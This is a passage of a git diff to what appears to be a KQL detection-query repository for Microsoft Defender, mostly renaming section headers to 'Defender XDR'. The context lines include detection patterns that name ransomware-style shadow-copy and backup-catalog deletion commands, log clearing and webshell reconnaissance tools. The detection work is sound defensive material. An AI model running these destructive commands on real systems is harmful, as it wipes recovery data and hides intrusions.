Threshold = 100; DeviceFileEvents @@ -50,4 +50,4 @@ applications that are less rare. SHA1, FileOriginUrl | sort by GlobalPrevalence, SHA1 -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/RareNetParamaterExecutions.md b/Defender For Endpoint/RareNetParamaterExecutions.md index d408ce2..4597cec 100644 --- a/Defender For Endpoint/RareNetParamaterExecutions.md +++ b/Defender For Endpoint/RareNetParamaterExecutions.md @@ -21,7 +21,7 @@ Adversaries might use parameters that are not often used in your environment. #### References - https://learn.microsoft.com/en-us/windows/win32/winsock/net-exe-2 -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; let RareThresholdNetActionType = 10; // Determine how rare a command must be to be included in the results @@ -128,4 +128,4 @@ DeviceProcessEvents ProcessCommandLine has "view", "VIEW", "Else") | where NetActionType in (RareNetParameters) | project-reorder TimeGenerated, AccountUpn, ProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md b/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md index a780e82..642dbd4 100644 --- a/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md +++ b/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md @@ -26,7 +26,7 @@ These might of course include legit, rare outgoing connections but more importan - [Query walkthrough at Medium](https://ateixei.medium.com/f5bfdc0d55d6?source=friends_link&sk=7f5d56cf3a85c126992ce866dd864b86) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) // Query walkthrough: https://ateixei.medium.com/f5bfdc0d55d6?source=friends_link&sk=7f5d56cf3a85c126992ce866dd864b86 diff --git a/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md b/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md index 5c7462c..b38a3ca 100644 --- a/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md +++ b/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md @@ -15,7 +15,7 @@ Regsvr32 can be abused to proxy execution of malicious code. It can be spawned f - https://redcanary.com/threat-detection-report/threats/TA551/ - https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/ -### Defender For Endpoint +### Defender XDR ``` let OfficeApplications = dynamic(['winword.exe', 'powerpnt.exe', 'excel.exe']); DeviceProcessEvents diff --git a/Defender For Endpoint/RemoteSMBConnection.md b/Defender For Endpoint/RemoteSMBConnection.md index 3875eab..e5f07f7 100644 --- a/Defender For Endpoint/RemoteSMBConnection.md +++ b/Defender For Endpoint/RemoteSMBConnection.md @@ -1,6 +1,6 @@ # Triggers when a remote SBM connection has been found ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/RunasWithSavedCredentials.md b/Defender For Endpoint/RunasWithSavedCredentials.md index ec250fa..64cb037 100644 --- a/Defender For Endpoint/RunasWithSavedCredentials.md +++ b/Defender For Endpoint/RunasWithSavedCredentials.md @@ -18,7 +18,7 @@ A actor can use saved credentials to gain privilige escallation. - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc771525(v=ws.11) - https://superuser.com/questions/581548/runas-savecred-ask-for-password-if-another-user-runs-the-same-batch-file/903881#903881 -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents | where FileName == "runas.exe" @@ -37,4 +37,4 @@ DeviceProcessEvents // Detect commandlines that contain savedcred this line can be removed to display all runas commands | where ProcessCommandLine contains "/savecred" | project TimeGenerated, DeviceName, TargetAccount, ProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/SMBSessionsByDevice.md b/Defender For Endpoint/SMBSessionsByDevice.md index c4d6ebf..7a5e05b 100644 --- a/Defender For Endpoint/SMBSessionsByDevice.md +++ b/Defender For Endpoint/SMBSessionsByDevice.md @@ -1,6 +1,6 @@ # Total SMB Sessions Created by a suspicious device -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let SuspiciousDevices = dynamic(['server1.com', 'laptop1.com']); diff --git a/Defender For Endpoint/SMBSessionsByFileName.md b/Defender For Endpoint/SMBSessionsByFileName.md index 41ae84a..cbb1f01 100644 --- a/Defender For Endpoint/SMBSessionsByFileName.md +++ b/Defender For Endpoint/SMBSessionsByFileName.md @@ -1,6 +1,6 @@ # Total SMB Sessions Created by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents diff --git a/Defender For Endpoint/SMBSessionsGeneratedByFile.md b/Defender For Endpoint/SMBSessionsGeneratedByFile.md index 41ae84a..cbb1f01 100644 --- a/Defender For Endpoint/SMBSessionsGeneratedByFile.md +++ b/Defender For Endpoint/SMBSessionsGeneratedByFile.md @@ -1,6 +1,6 @@ # Total SMB Sessions Created by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents diff --git a/Defender For Endpoint/SecurityLogCleared.md b/Defender For Endpoint/SecurityLogCleared.md index 07b7d1d..af3f3ef 100644 --- a/Defender For Endpoint/SecurityLogCleared.md +++ b/Defender For Endpoint/SecurityLogCleared.md @@ -18,7 +18,7 @@ An actor removes the security log to hide malicious activities. - https://content.fireeye.com/apt-41/rpt-apt41 - https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/ -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == 'SecurityLogCleared' @@ -29,4 +29,4 @@ DeviceEvents DeviceEvents | where ActionType == 'SecurityLogCleared' | project Timestamp, DeviceName, ActionType -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ShadowCopyDeletion.md b/Defender For Endpoint/ShadowCopyDeletion.md index 2beaff7..069e30e 100644 --- a/Defender For Endpoint/ShadowCopyDeletion.md +++ b/Defender For Endpoint/ShadowCopyDeletion.md @@ -18,7 +18,7 @@ An advasary removes the shadow copy before deploying ransomware to ensure that y - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin-delete-shadows - https://redcanary.com/blog/its-all-fun-and-games-until-ransomware-deletes-the-shadow-copies -## Defender For Endpoint +## Defender XDR ``` let CommonRansomwareExecutionCommands = dynamic([@'vssadmin.exe delete shadows /all /quiet', @'wmic.exe shadowcopy delete', @'wbadmin delete catalog -quiet', diff --git a/Defender For Endpoint/SmartScreen/SmartScreenEvents.md b/Defender For Endpoint/SmartScreen/SmartScreenEvents.md index 638935d..e4821d6 100644 --- a/Defender For Endpoint/SmartScreen/SmartScreenEvents.md +++ b/Defender For Endpoint/SmartScreen/SmartScreenEvents.md @@ -1,6 +1,6 @@ # Hunt for SmartScreen events. What file was opened? Or which URL did they try to access? ---- -### Defender For Endpoint +### Defender XDR ```KQL DeviceEvents diff --git a/Defender For Endpoint/SmartScreen/SmartScreenOverride.md b/Defender For Endpoint/SmartScreen/SmartScreenOverride.md index f7c79f4..70a8df6 100644 --- a/Defender For Endpoint/SmartScreen/SmartScreenOverride.md +++ b/Defender For Endpoint/SmartScreen/SmartScreenOverride.md @@ -1,6 +1,6 @@ # Triggers when a user performs a SmartScreen Override action ---- -### Defender For Endpoint +### Defender XDR ```KQL DeviceEvents diff --git a/Defender For Endpoint/USB/ConnectedPnPTypes.md b/Defender For Endpoint/USB/ConnectedPnPTypes.md index a1c0ab0..024ceed 100644 --- a/Defender For Endpoint/USB/ConnectedPnPTypes.md +++ b/Defender For Endpoint/USB/ConnectedPnPTypes.md @@ -8,7 +8,7 @@ List the different Plug and Play (PnP) device types that are used in your organi #### References - https://learn.microsoft.com/en-us/powershell/module/pnpdevice/?view=windowsserver2022-ps -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "PnpDeviceConnected" @@ -27,4 +27,4 @@ DeviceEvents | extend PnPType = tostring(split(DeviceId, @"\", 0)[0]) | summarize Total = count() by PnPType | sort by Total -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/USB/USBConnectors.md b/Defender For Endpoint/USB/USBConnectors.md index bad40d1..caa09a6 100644 --- a/Defender For Endpoint/USB/USBConnectors.md +++ b/Defender For Endpoint/USB/USBConnectors.md @@ -14,7 +14,7 @@ You can filter on the description by adding: - https://learn.microsoft.com/en-us/powershell/module/pnpdevice/?view=windowsserver2022-ps - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/advanced-hunting-updates-usb-events-machine-level-actions-and/ba-p/824152 -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "PnpDeviceConnected" @@ -37,4 +37,4 @@ DeviceEvents | project-reorder ClassName, PnPType, DeviceDescription, VendorIds, DeviceId | summarize TotalEvents = count() by DeviceDescription | sort by TotalEvents -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Visualizations/Visualization - FileTypes.md b/Defender For Endpoint/Visualizations/Visualization - FileTypes.md index 56ef92a..e5d9e20 100644 --- a/Defender For Endpoint/Visualizations/Visualization - FileTypes.md +++ b/Defender For Endpoint/Visualizations/Visualization - FileTypes.md @@ -1,6 +1,6 @@ # Visualize FileTypes based on DeviceFileEvents -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 7d; diff --git a/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md b/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md index d14a327..386bcb1 100644 --- a/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md +++ b/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md @@ -1,7 +1,7 @@ # Display the Inspected Network Signatures -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md b/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md index 081b3a9..e1e2423 100644 --- a/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md +++ b/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md @@ -1,6 +1,6 @@ # Logon Failure Reasons -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md b/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md index 21e5568..243ba14 100644 --- a/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md +++ b/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md @@ -1,6 +1,6 @@ # Visualize the Sysinternal tool usage of the last 30 days -### Defender For Endpoint +### Defender XDR ``` let SysInternalSuite = dynamic(["accesschk.exe","accesschk64.exe","AccessEnum.exe", "AdExplorer.exe","ADExplorer.exe","ADExplorer64.exe","ADInsight.chm","ADInsight.exe","ADInsight64.exe","adrestore.exe","adrestore64.exe","Autologon.exe","Autologon64.exe","autoruns.chm","Autoruns.exe","Autoruns64.exe","autorunsc.exe","autorunsc64.exe","Bginfo.exe","Bginfo64.exe","Cacheset.exe","Cacheset64.exe","Clockres.exe","Clockres64.exe","Contig.exe","Contig64.exe","Coreinfo.exe","Coreinfo64.exe","CPUSTRES.exe","CPUSTRES64.exe","ctrl2cap.amd.sys","ctrl2cap.exe","Dbgview.chm","Dbgview.exe","dbgview64.exe","Desktops.exe","Desktops64.exe","Disk2vhd.chm","disk2vhd.exe","disk2vhd64.exe","diskext.exe","diskext64.exe","Diskmon.exe","Diskmon64.exe","DiskView.exe","DiskView64.exe","du.exe","du64.exe","efsdump.exe","Eula.txt","FindLinks.exe","FindLinks64.exe","handle.exe","handle64.exe","hex2dec.exe","hex2dec64.exe","junction.exe","junction64.exe","ldmdump.exe","Listdlls.exe","Listdlls64.exe","livekd.exe","livekd64.exe","LoadOrd.exe","LoadOrd64.exe","LoadOrdC.exe","LoadOrdC64.exe","logonsessions.exe","logonsessions64.exe","movefile.exe","movefile64.exe","notmyfault.exe","notmyfault64.exe","notmyfaultc.exe","notmyfaultc64.exe","ntfsinfo.exe","ntfsinfo64.exe","pendmoves.exe","pendmoves64.exe","pipelist.exe","pipelist64.exe","portmon.exe","procdump.exe","procdump64.exe","procexp.chm","procexp.exe","procexp64.exe","procmon.chm","Procmon.exe","Procmon64.exe","PsExec.exe","PsExec64.exe","psfile.exe","psfile64.exe","PsGetsid.exe","PsGetsid64.exe","PsInfo.exe","PsInfo64.exe","pskill.exe","pskill64.exe","pslist.exe","pslist64.exe","PsLoggedon.exe","PsLoggedon64.exe","psloglist.exe","psloglist64.exe","pspasswd.exe","pspasswd64.exe","psping.exe","psping64.exe","PsService.exe","PsService64.exe","psshutdown.exe","psshutdown64.exe","pssuspend.exe","pssuspend64.exe","Pstools.chm","psversion.txt","RAMMap.exe","RAMMap64.exe","RDCMan.exe","readme.txt","RegDelNull.exe","RegDelNull64.exe","regjump.exe","ru.exe","ru64.exe","sdelete.exe","sdelete64.exe","ShareEnum.exe","ShareEnum64.exe","ShellRunas.exe","sigcheck.exe","sigcheck64.exe","streams.exe","streams64.exe","strings.exe","strings64.exe","sync.exe","sync64.exe","Sysmon.exe","Sysmon64.exe","tcpvcon.exe","tcpvcon64.exe","tcpview.chm","tcpview.exe","tcpview64.exe","Testlimit.exe","Testlimit64.exe","Vmmap.chm","vmmap.exe","vmmap64.exe","Volumeid.exe","Volumeid64.exe","whois.exe","whois64.exe","Winobj.exe","Winobj64.exe","ZoomIt.exe","ZoomIt64.exe"]); diff --git a/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md b/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md index 06efff1..cfc04a1 100644 --- a/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md +++ b/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md @@ -1,6 +1,6 @@ # Unauthorized Logon actions by Domain and Account -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md b/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md index 678a19b..edab3c4 100644 --- a/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md +++ b/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md @@ -2,7 +2,7 @@ In order to get results the device groups need to be defined: [MS Documentation](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/machine-groups?view=o365-worldwide) -### Defender For Endpoint +### Defender XDR ``` DeviceInfo diff --git a/Defender For Endpoint/WMICAntivirusDiscovery.md b/Defender For Endpoint/WMICAntivirusDiscovery.md index d02454d..15ad786 100644 --- a/Defender For Endpoint/WMICAntivirusDiscovery.md +++ b/Defender For Endpoint/WMICAntivirusDiscovery.md @@ -24,7 +24,7 @@ An actor uses WMIC to list the installed antivirus solutions - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents // Filter only on WMIC executions diff --git a/Defender For Endpoint/WebshellDetection.md b/Defender For Endpoint/WebshellDetection.md index 06edfd8..859c30f 100644 --- a/Defender For Endpoint/WebshellDetection.md +++ b/Defender For Endpoint/WebshellDetection.md @@ -27,7 +27,7 @@ Look for suspicious process that IIS worker process (w3wp.exe), nginx, Apache HT Look for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: “arp”, “certutil”, “cmd”, “echo”, “ipconfig”, “gpresult”, “hostname”, “net”, “netstat”, “nltest”, “nslookup”, “ping”, “powershell”, “psexec”, “qwinsta”, “route”, “systeminfo”, “tasklist”, “wget”, “whoami”, “wmic”, etc.) -## Defender For Endpoint +## Defender XDR ```KQL let webservers = dynamic(["beasvc.exe", "coldfusion.exe", "httpd.exe", "owstimer.exe", "visualsvnserver.exe", "w3wp.exe", "tomcat", "apache2", "nginx"]); let linuxShells = dynamic(["/bin/bash", "/bin/sh", "python", "python3"]); diff --git a/Defender For Endpoint/WevtutilClearLogs.md b/Defender For Endpoint/WevtutilClearLogs.md index 6c3f8f9..071b28c 100644 --- a/Defender For Endpoint/WevtutilClearLogs.md +++ b/Defender For Endpoint/WevtutilClearLogs.md @@ -19,7 +19,7 @@ Multiple Threat Actors levarage this technique to hide from defenders #### References - https://www.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | extend ProcessCommandLineToLower = tolower(ProcessCommandLine) @@ -32,4 +32,4 @@ DeviceProcessEvents | extend ProcessCommandLineToLower = tolower(ProcessCommandLine) | where ProcessCommandLineToLower has "wevtutil.exe" and ProcessCommandLineToLower has_any ("cl", "clear-log") | project-reorder TimeGenerated, DeviceName, AccountSid, ProcessCommandLine, InitiatingProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/WindowsNetworkSniffing.md b/Defender For Endpoint/WindowsNetworkSniffing.md index beb5c37..5e6b891 100644 --- a/Defender For Endpoint/WindowsNetworkSniffing.md +++ b/Defender For Endpoint/WindowsNetworkSniffing.md @@ -17,7 +17,7 @@ Actor can use network sniffing to capture information. If data (passwords) is se #### References - https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md b/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md index 53cfea8..75aef18 100644 --- a/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md +++ b/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md @@ -25,7 +25,7 @@ The risk addressed by this detection rule is the unauthorized installation of Az - [Azure ARC Agent Overview](https://learn.microsoft.com/en-us/azure/azure-arc/servers/agent-overview) - [Microsoft Security Blog on Azure ARC](https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/) -## Defender For Endpoint +## Defender XDR ```KQL // Unexpected installation of azure arc agent - service installation let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"]; diff --git a/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md b/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md index db3eabb..f38a420 100644 --- a/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md +++ b/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL //this will be noisy and no good for a SIEM analytic DeviceProcessEvents diff --git a/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md b/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md index f847e69..ec04aba 100644 --- a/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md +++ b/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md @@ -26,7 +26,7 @@ FIN7 have been observed performing this behaviour in recent intrusions. FIN7 act #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1") diff --git a/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md b/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md index f50fdb4..aa6baa5 100644 --- a/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md +++ b/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [MSIX installer malware delivery on the rise across multiple campaigns](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL // Detection opportunity 5: MSBuild without commands DeviceNetworkEvents diff --git a/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md b/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md index 17a2ac3..baabc5b 100644 --- a/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md +++ b/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md @@ -26,7 +26,7 @@ FIN7 have been observed performing this behaviour in recent intrusions. FIN7 act #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL // Detection opportunity 2: NetSupport running from unexpected directory DeviceProcessEvents diff --git a/Defender For Endpoint/ttp_t1562-001_disabledefender.md b/Defender For Endpoint/ttp_t1562-001_disabledefender.md index ac93af1..b1efae2 100644 --- a/Defender For Endpoint/ttp_t1562-001_disabledefender.md +++ b/Defender For Endpoint/ttp_t1562-001_disabledefender.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL //Detection opportunity 3: Abusing PowerShell to disable Defender components DeviceProcessEvents diff --git a/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md b/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md index 9b4db0b..ce94625 100644 --- a/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md +++ b/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md @@ -8,7 +8,7 @@ In Windows a password can be set so that it will never expire. This is normaly n #### Risk A account that has as password that never exprided on and it has a weak password. That makes it vulnerable for Brute Force attacks. -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents | where ActionType == "Account Password Never Expires changed" diff --git a/Defender For Identity/AnomalousGroupPolicyDiscovery.md b/Defender For Identity/AnomalousGroupPolicyDiscovery.md index 5077398..c57ee23 100644 --- a/Defender For Identity/AnomalousGroupPolicyDiscovery.md +++ b/Defender For Identity/AnomalousGroupPolicyDiscovery.md @@ -16,7 +16,7 @@ Potential false positive is a new Administrator that has not performed group pol #### Risk An attacker queries Group Policy object to gain valuable information about the environment. -## Defender For Endpoint +## Defender XDR ```KQL let PreviousActivity = materialize ( IdentityQueryEvents diff --git a/Defender For Identity/AnomalousLDAPTraffic.md b/Defender For Identity/AnomalousLDAPTraffic.md index 7a95f53..7b2e5fc 100644 --- a/Defender For Identity/AnomalousLDAPTraffic.md +++ b/Defender For Identity/AnomalousLDAPTraffic.md @@ -27,7 +27,7 @@ An adversary has gained access to your network and performes LDAP queries to per #### References - https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ -## Defender For Endpoint +## Defender XDR ```KQL // Variables to define the anomalous behaviour let starttime = 30d; @@ -94,4 +94,4 @@ TimeSeriesAlerts // Baseline is the most important result, that is the avarage amount of LDAP queries executed by a device, the PerHourCount shows the deviation from this amount. | project DeviceName, Timestamp, PerHourCount, baseline, anomalies, score | where PerHourCount > TotalEventsThreshold -``` \ No newline at end of file +``` diff --git a/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md b/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md index dfea823..10afa38 100644 --- a/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md +++ b/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md @@ -8,7 +8,7 @@ Defender For Identity identifies lateral movement paths to all sensitive account #### References - https://learn.microsoft.com/en-us/defender-for-identity/understand-lateral-movement-paths -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents diff --git a/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md b/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md index 8023589..67e226e 100644 --- a/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md +++ b/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md @@ -24,7 +24,7 @@ An adversary has successfully performed a brute force on an account and changes #### References - https://attack.mitre.org/datasources/DS0002/#User%20Account%20Modification -## Defender For Endpoint +## Defender XDR ``` let FailedLogonsThreshold = 20; let SuccessfulLogonsThreshold = 1; @@ -85,4 +85,4 @@ IdentityLogonEvents // Remove all entries where the password change took place before the brute force | where TimeDifference > 0 | where TimeDifference <= SearchWindow -``` \ No newline at end of file +``` diff --git a/Defender For Identity/PotentialKerberosEncryptionDowngrade.md b/Defender For Identity/PotentialKerberosEncryptionDowngrade.md index 41cb392..65a5e8c 100644 --- a/Defender For Identity/PotentialKerberosEncryptionDowngrade.md +++ b/Defender For Identity/PotentialKerberosEncryptionDowngrade.md @@ -26,7 +26,7 @@ An adversary has performed an downgrade attack to be able to perform kerberoasti #### References - https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents | where ActionType == "Account Supported Encryption Types changed" @@ -51,4 +51,4 @@ IdentityDirectoryEvents // Exclude the devices that did already have a supported encryption enabled. This is mostly due to the deployment of a device. | where FromAccountSupportedEncryptionTypes != "N/A" | project TimeGenerated, DeviceName, FromAccountSupportedEncryptionTypes, ToAccountSupportedEncryptionTypes, ActorDevice, TargetDevice -``` \ No newline at end of file +``` diff --git a/Defender For Identity/SMBFileCopy.md b/Defender For Identity/SMBFileCopy.md index 560ca84..c183616 100644 --- a/Defender For Identity/SMBFileCopy.md +++ b/Defender For Identity/SMBFileCopy.md @@ -16,7 +16,7 @@ A false positive would be a aministrator that would perform legitimate SMB file #### Risk A actor uses a SMB file copy to distrubute malware in your environment. -## Defender For Endpoint +## Defender XDR ``` let WhitelistedAccounts = dynamic(['account1', 'account2']); diff --git a/Defender For Identity/UserAddedToSensitiveGroup.md b/Defender For Identity/UserAddedToSensitiveGroup.md index b23175c..dd2e792 100644 --- a/Defender For Identity/UserAddedToSensitiveGroup.md +++ b/Defender For Identity/UserAddedToSensitiveGroup.md @@ -19,7 +19,7 @@ A attacker has added themself to a sensitive group and can perform priviliges ac #### References - https://learn.microsoft.com/en-us/defender-for-identity/entity-tags#sensitive-entities -### Defender For Endpoint +### Defender XDR ```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents diff --git a/Defender For Identity/Visualization - ClearTextLDAPSignIns.md b/Defender For Identity/Visualization - ClearTextLDAPSignIns.md index 35472b1..e5147c8 100644 --- a/Defender For Identity/Visualization - ClearTextLDAPSignIns.md +++ b/Defender For Identity/Visualization - ClearTextLDAPSignIns.md @@ -5,7 +5,7 @@ #### Description This query visualises the top 100 Devices that initiate the most clear text LDAP authentications. You preferably want to use an encrypted form of LDAP instead of cleartext. -## Defender For Endpoint +## Defender XDR ``` IdentityLogonEvents diff --git a/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md b/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md index a045326..eefe37f 100644 --- a/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md +++ b/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md @@ -5,7 +5,7 @@ #### Description Visualize the top 100 users that have performed the most interactive sign ins. -### Defender For Endpoint +### Defender XDR ``` IdentityLogonEvents diff --git a/Defender XDR/AlertSupressionAdded.md b/Defender XDR/AlertSupressionAdded.md index 513db58..949c753 100644 --- a/Defender XDR/AlertSupressionAdded.md +++ b/Defender XDR/AlertSupressionAdded.md @@ -9,7 +9,7 @@ This query lists all the supressions that have been added to Defender XDR. This - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/introducing-the-new-alert-suppression-experience/ba-p/3562719 - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -26,4 +26,4 @@ CloudAppEvents | extend Workload = tostring(parse_json(RawEventData).Workload), ResultStatus = tostring(parse_json(RawEventData).ResultStatus), ResultDescription = tostring(parse_json(RawEventData).ResultDescription) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId | project-reorder TimeGenerated, Workload, ResultDescription, ResultStatus, InitiatedByAccountName, InitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/CustomDetectionDeletion.md b/Defender XDR/CustomDetectionDeletion.md index 13fa451..5967d68 100644 --- a/Defender XDR/CustomDetectionDeletion.md +++ b/Defender XDR/CustomDetectionDeletion.md @@ -18,7 +18,7 @@ An actor has gotten access to an account that is able to delete custom detection - https://learn.microsoft.com/en-us/defender-xdr/custom-detections-overview - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -33,4 +33,4 @@ CloudAppEvents | where ActionType == "DeleteCustomDetection" | extend RuleName = tostring(parse_json(RawEventData).RuleName), Query = tostring(parse_json(RawEventData).Query), AlertDescription = parse_json(RawEventData).AlertDescription | project-reorder AccountDisplayName, AccountId, RuleName, AlertDescription, Query -``` \ No newline at end of file +``` diff --git a/Defender XDR/CustomDetectionReport.md b/Defender XDR/CustomDetectionReport.md index 56cc651..2f44508 100644 --- a/Defender XDR/CustomDetectionReport.md +++ b/Defender XDR/CustomDetectionReport.md @@ -32,7 +32,7 @@ While the query ignores all simple modifications (EditCustomDetection), it will - https://learn.microsoft.com/en-us/defender-xdr/custom-detections-overview - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For 